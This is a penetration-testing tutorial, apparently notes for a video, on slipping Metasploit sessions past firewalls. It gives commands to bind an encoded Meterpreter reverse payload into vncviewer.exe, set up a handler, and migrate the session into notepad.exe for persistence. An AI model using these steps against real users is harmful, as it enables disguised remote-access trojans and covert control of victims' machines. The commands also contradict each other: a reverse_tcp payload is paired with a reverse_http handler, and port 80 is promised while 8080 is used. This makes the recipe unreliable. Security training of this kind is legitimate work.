Premise

In this video walkthrough, we used advanced Metasploit scripts that are automatically run once the session is started. We used AutorRunScript to migrate to another process once we receive the connection. We used HTTP payloads as well to blend our connection with HTTP legitimate traffic.

Skills Learned

  • Metasploit
  • Windows Firewall
  • Firewall Evasion

The Challenge: Firewalls

One of the biggest hurdles in penetration testing is the firewall. Most corporate networks are configured to block incoming connections on the common ports that Metasploit uses. However, they almost always allow traffic on port 80, which is used for web Browse. I’m going to leverage this to my advantage by using an HTTP reverse payload. This type of payload will communicate over port 80, making it look like normal web traffic and allowing it to slip past the firewall.

Creating the Payload

To create my payload, I’ll use a tool called MSFvenom. I’m going to create a payload that is specifically designed for a Windows machine. I’ll also use an encoder to help it evade some basic antivirus detection.

To make the payload look less suspicious, I’m going to bind it to a legitimate Windows application, in this case, VNC Viewer. This means that when the user runs the VNC Viewer application, my payload will also run in the background.

Setting Up the Listener

Next, I’ll set up a listener in the Metasploit console. This listener will wait for the payload to connect back to my machine. I’ll use the exploit/multi/handler module and configure it to use the same HTTP reverse payload that I created earlier.

The Secret to Persistence: AutoRunScript

Here’s where things get interesting. What happens if the user closes the VNC Viewer application? Normally, this would kill my connection. But I’m going to use a neat trick to make sure my session stays alive.

I’m going to use the AutoRunScript option in Metasploit to automatically migrate my Meterpreter session to a different process as soon as a connection is established. In this case, I’ll migrate the session to notepad.exe. This means that even if the user closes VNC Viewer, my connection will remain active through the Notepad process.

The Demonstration

Now, let’s see this in action. I’ll send the payload to the victim machine and wait for the user to run it. As soon as they do, I’ll get a connection. Then, I’ll have the user close the VNC Viewer application. You’ll see that my session doesn’t die. Instead, it seamlessly migrates to the notepad.exe process, and I’m still in control. This is a powerful technique for maintaining a persistent connection on a target machine.

Technical Commands Used

Here are the key commands I used in this demonstration:

  • Creating the Payload with msfvenom:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<your_client_ip> LPORT=8080 -f exe -e xor_dynamic -i 9 -x vncviewer.exe -o vncviewer_payload.exe
  • Launching the Metasploit Console:msfconsole
  • Setting up the Multi-Handler in msfconsole:
    • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_http
    • set lhost <your_client_ip>
    • set lport 8080
    • show options
  • Setting the AutoRunScript for Process Migration:set autorunscript migrate -f
  • Executing the Exploit:exploit

Video Walkthrough

, , ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles